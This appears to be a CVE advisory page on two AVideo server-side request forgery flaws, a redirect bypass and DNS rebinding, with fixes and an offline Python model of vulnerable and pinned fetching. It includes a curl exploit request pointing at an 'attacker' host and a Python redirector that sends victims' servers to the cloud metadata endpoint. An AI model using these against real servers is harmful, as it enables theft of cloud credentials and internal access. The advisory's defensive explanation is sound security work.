How the CVE works (two overlapping vulnerabilities):
- Redirect bypass: the vulnerable endpoints (plugin/AI/receiveAsync.json.php, objects/EpgParser.php) call isSSRFSafeURL() to validate a user-supplied URL. If it passes, they fetch it with a bare file_get_contents(), which by default follows HTTP redirects (follow_location=1). isSSRFSafeURL() checks only the initial URL, so an attacker supplies a URL on a hostile server that answers with a 302 to an internal address (e.g., http://169.254.169.254/latest/meta-data/). The redirect target is never re-validated, the metadata endpoint is fetched, and its response (including any credentials in it) ends up stored by the application.
- DNS rebinding TOCTOU: isSSRFSafeURL() has an out-parameter $resolvedIP intended for DNS pinning (CURLOPT_RESOLVE). Eight of its nine callers discard it and pass the original hostname to a fetch function (file_get_contents() or url_get_contents()), which resolves the name a second time. An attacker uses a domain with TTL=0 that resolves to a public IP on the first lookup (passing validation) and to 127.0.0.1 on the second, so the server fetches from its own internal services.
Severity: High (CVSS 7.7).
DailyCVE form:
Platform: AVideo
Version: All versions before the fix
Vulnerability: SSRF (redirect+dns rebind)
Severity: High (7.7)
Date: 2025-04-15
Prediction: 2025-05-01 (patch within 2 weeks)
What Undercode Say:
Analytics:
- Exploitability: Authenticated attacker, low complexity
- Prevalence: Cloud metadata + internal network scanning
Simulate the redirect bypass (token and ai_responses_id are whatever the authenticated session provides):
  curl -X POST http://target/plugin/AI/receiveAsync.json.php \
    -d "type=image&token=VALID&ai_responses_id=1&response[bash][0][bash]=http://attacker:8888/redir"
Attacker-controlled server on port 8888, answering every GET with a 302 to the metadata endpoint:
  python3 -c '
  from http.server import HTTPServer, BaseHTTPRequestHandler
  class R(BaseHTTPRequestHandler):
      def do_GET(self):
          self.send_response(302)
          self.send_header("Location", "http://169.254.169.254/latest/meta-data/")
          self.end_headers()
  HTTPServer(("0.0.0.0", 8888), R).serve_forever()
  '
Exploit:
- For the redirect bypass: submit a URL whose server 302s to an internal address or the cloud metadata endpoint. The server follows the redirect, fetches the response and stores it as a video thumbnail.
- For DNS rebinding: use a domain with TTL=0 that answers first with a public IP and then with 127.0.0.1 (or another private address). Submit it to any of the 8 vulnerable endpoints; validation sees the public IP, the fetch resolves the name again and connects to the internal host.
Protection from this CVE:
- Redirect bypass: never let the fetch follow redirects on its own. Either disable them (a bare file_get_contents() needs a stream context with follow_location => 0) or follow each hop manually and run the Location target through isSSRFSafeURL() before requesting it. The patch replaces the bare file_get_contents() calls with url_get_contents(), which does not follow redirects blindly (each redirect target must pass the same validation). Minimal stream-context form:
  $ctx = stream_context_create(['http' => ['follow_location' => 0]]);
  $imageContent = file_get_contents($url, false, $ctx);
- DNS rebinding: capture $resolvedIP from isSSRFSafeURL() and pass it to a curl-based fetch that pins the connection with CURLOPT_RESOLVE, so the request goes to the IP that was validated rather than to whatever a second DNS lookup returns. Disabling redirects alone does not close this hole; both fixes are needed.
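The two bugs explained at the top of the page and the two fixes in this section, modelled offline as an added example (this is not AVideo's code and not the real isSSRFSafeURL()). A fake resolver stands in for DNS and a fake transport for HTTP, so the TOCTOU and the redirect hop can be reproduced deterministically. naive_fetch() is the "validate once, then fetch by hostname following redirects" pattern; pinned_fetch() validates every hop and connects to the IP that passed validation, which is what CURLOPT_RESOLVE pinning plus per-hop validation achieves in PHP. The hostnames attacker.example and rebind.example, the addresses 11.22.33.44 and 44.55.66.77, and all response bodies are constructed for the example.

```python
"""Added example: the AVideo SSRF redirect bypass and DNS-rebinding TOCTOU next to a
pinned, per-hop-validated fetch. All names, IPs and responses below are constructed."""
import ipaddress
from urllib.parse import urljoin, urlsplit

REDIRECTS = {301, 302, 303, 307, 308}


def is_internal_ip(ip_str):
    """Anything not globally routable (loopback, RFC 1918, link-local such as
    169.254.169.254, CGNAT, multicast, unspecified) is treated as internal."""
    return not ipaddress.ip_address(ip_str).is_global


def validate_url(url, resolve):
    """Stand-in for isSSRFSafeURL() (assumed behaviour, not the real function): parse,
    resolve the host once, reject internal targets. Returns the resolved IP so the
    caller can pin it, i.e. the out-parameter most callers on the page discard."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"unsupported URL: {url}")
    ip = resolve(parts.hostname)
    if is_internal_ip(ip):
        raise ValueError(f"refusing internal target {parts.hostname} -> {ip}")
    return ip


def naive_fetch(url, resolve, transport, max_hops=5):
    """Vulnerable pattern: validate once, then fetch by hostname and follow redirects
    blindly (what a bare file_get_contents() with follow_location=1 does)."""
    validate_url(url, resolve)                       # resolved IP thrown away
    for _ in range(max_hops):
        ip = resolve(urlsplit(url).hostname)         # second lookup: the TOCTOU window
        status, headers, body = transport(ip, url)
        if status in REDIRECTS:
            url = urljoin(url, headers["Location"])  # target never re-validated
            continue
        return body
    raise RuntimeError("too many redirects")


def pinned_fetch(url, resolve, transport, max_hops=5):
    """Hardened pattern: every hop is validated and the connection goes to the IP that
    passed validation (CURLOPT_RESOLVE in PHP), so a changed DNS answer is never used."""
    for _ in range(max_hops):
        ip = validate_url(url, resolve)
        status, headers, body = transport(ip, url)
        if status in REDIRECTS:
            url = urljoin(url, headers["Location"])  # re-validated on the next iteration
            continue
        return body
    raise RuntimeError("too many redirects")


# --- constructed scenario -----------------------------------------------------------
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
ATTACKER_IP = "11.22.33.44"        # constructed public IP of the attacker's redirector
REBIND_PUBLIC_IP = "44.55.66.77"   # constructed first answer of the TTL=0 rebinding name


def make_resolver(table, rebind=None):
    """Fake DNS. `table` maps names to fixed IPs; `rebind` maps names to (first, later)
    answers, modelling a TTL=0 domain whose answer changes between two lookups."""
    seen = set()

    def resolve(host):
        try:
            return str(ipaddress.ip_address(host))   # IP literal: nothing to look up
        except ValueError:
            pass
        if rebind and host in rebind:
            first, later = rebind[host]
            answer = later if host in seen else first
            seen.add(host)
            return answer
        return table[host]
    return resolve


def scenario_transport(ip, url):
    """Fake HTTP: what the server reachable at `ip` answers (constructed responses)."""
    if ip == ATTACKER_IP:
        return 302, {"Location": METADATA_URL}, b""
    if ip == "169.254.169.254":
        return 200, {}, b"constructed-iam-role-credentials"
    if ip == "127.0.0.1":
        return 200, {}, b"constructed internal admin panel"
    return 200, {}, b"harmless image bytes"


def run_redirect_case(fetch):
    """Attacker-controlled URL whose server 302s to the metadata endpoint."""
    resolve = make_resolver({"attacker.example": ATTACKER_IP})
    try:
        return fetch("http://attacker.example/redir", resolve, scenario_transport)
    except ValueError as err:
        return f"blocked: {err}"


def run_rebinding_case(fetch):
    """Name that resolves to a public IP for validation and to 127.0.0.1 afterwards."""
    resolve = make_resolver({}, rebind={"rebind.example": (REBIND_PUBLIC_IP, "127.0.0.1")})
    try:
        return fetch("http://rebind.example/thumb.jpg", resolve, scenario_transport)
    except ValueError as err:
        return f"blocked: {err}"


if __name__ == "__main__":
    for name, fetch in (("naive", naive_fetch), ("pinned", pinned_fetch)):
        print(f"{name:6} redirect : {run_redirect_case(fetch)!r}")
        print(f"{name:6} rebinding: {run_rebinding_case(fetch)!r}")
```

Running the script prints the four outcomes: naive_fetch() returns the metadata body in the redirect case and the loopback admin page in the rebinding case, while pinned_fetch() refuses the 169.254.169.254 hop and, in the rebinding case, talks only to the public IP that was validated. The check uses the ipaddress module's is_global flag rather than a hand-written deny-list, so link-local, CGNAT, multicast and unspecified addresses are rejected too; in the PHP fix the equivalent pin is CURLOPT_RESOLVE set to the validated IP, which keeps the original hostname for the Host header and TLS SNI.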
Impact:
- Leak cloud IAM credentials, instance metadata
- Access internal databases, admin panels, or monitoring endpoints
- Port-scan internal network via the server as a proxy
- Exfiltrated data stored as thumbnails, retrievable via application UI
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

